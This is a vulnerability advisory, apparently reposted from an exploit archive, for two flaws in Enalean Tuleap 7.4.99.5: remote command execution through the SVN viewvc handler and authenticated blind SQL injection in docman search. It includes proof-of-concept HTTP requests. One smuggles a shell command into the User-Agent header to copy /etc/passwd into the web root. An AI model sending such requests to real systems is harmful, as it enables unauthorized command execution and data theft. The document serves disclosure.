Enalean Tuleap 7.4.99.5 - Remote Command Execution / Blind SQL Injection Vulnerabilities

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
 
 
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
 
 
Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.

#  0day.today [2018-01-01]  #